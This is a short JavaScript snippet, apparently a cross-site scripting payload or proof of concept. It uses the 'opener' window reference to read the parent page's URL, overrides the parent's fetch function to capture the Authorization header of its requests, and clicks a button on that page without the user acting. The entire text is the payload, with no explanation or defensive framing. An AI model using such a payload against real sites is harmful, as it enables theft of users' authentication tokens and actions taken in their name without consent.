console.log(`[XSS]> opener.location.href: ${opener.location.href}`); opener.fetch = (url, options) => console.log(options.headers["Authorization"]); opener.document.querySelectorAll("button")[2].click();